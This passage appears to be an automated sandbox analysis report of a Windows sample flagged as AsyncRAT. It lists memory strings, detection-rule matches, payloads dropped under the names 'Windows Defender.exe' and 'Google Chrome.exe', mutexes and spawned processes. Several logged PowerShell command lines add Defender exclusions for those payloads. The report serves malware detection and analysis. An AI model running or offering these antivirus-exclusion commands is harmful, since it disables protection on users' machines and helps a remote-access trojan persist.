Source: powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.2977692716.000001D0F8241000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000009.00000002.1815371128.000001D5759FA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000006.00000002.1685428644.000002D229630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1685721301.000002D22983D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

                        System Summary

Source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\Desktop\X.exe | Code function: 0_2_00007FFAAB780A31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAB79208D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAB8430E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAB8630E9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Code function: 11_2_00007FFAAB7A16E9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Code function: 11_2_00007FFAAB7A0E5E
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Code function: 11_2_00007FFAAB7A20C1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Code function: 12_2_00007FFAAB7A16E9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Code function: 12_2_00007FFAAB7A0E5E
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Code function: 12_2_00007FFAAB7A20C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAAB8730E9
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Code function: 22_2_00007FFAAB7A16E9
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Code function: 22_2_00007FFAAB7A0E5E
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Code function: 22_2_00007FFAAB7A20C1
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Code function: 25_2_00007FFAAB7B16E9
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Code function: 25_2_00007FFAAB7B0E5E
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Code function: 25_2_00007FFAAB7B20C1
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Windows Defender.exe 576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
Source: X.exe | Static PE information: No import functions for PE file found
Source: X.exe, 00000000.00000002.1747299745.000000000410D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGoogle Chrome.exe4 vs X.exe
Source: X.exe, 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGoogle Chrome.exe4 vs X.exe
Source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Google Chrome.exe.0.dr, EPF8Pua7qdV0S9h4vNzRF9epgA0dMGa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Google Chrome.exe.0.dr, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Google Chrome.exe.0.dr, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, EPF8Pua7qdV0S9h4vNzRF9epgA0dMGa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.cs | Base64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.cs | Base64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.cs | Base64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.X.exe.140f9ac0.0.raw.unpack, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Google Chrome.exe.0.dr, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Google Chrome.exe.0.dr, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@36/35@3/1
Source: C:\Users\user\Desktop\X.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\X.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Mutant created: \Sessions\1\BaseNamedObjects\nk4GrQt4g7tiU7a0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Users\user\Desktop\X.exe | Mutant created: \Sessions\1\BaseNamedObjects\gYH9wmx6Oq2bUbIgm
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Mutant created: \Sessions\1\BaseNamedObjects\WR2rJvQsDgMo0fED
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Users\user\Desktop\X.exe | File created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
Source: X.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: X.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\X.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\X.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: X.exe | ReversingLabs: Detection: 63%
Source: unknown | Process created: C:\Users\user\Desktop\X.exe "C:\Users\user\Desktop\X.exe"
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe"
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe"
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe"
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe"
Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\X.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\X.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
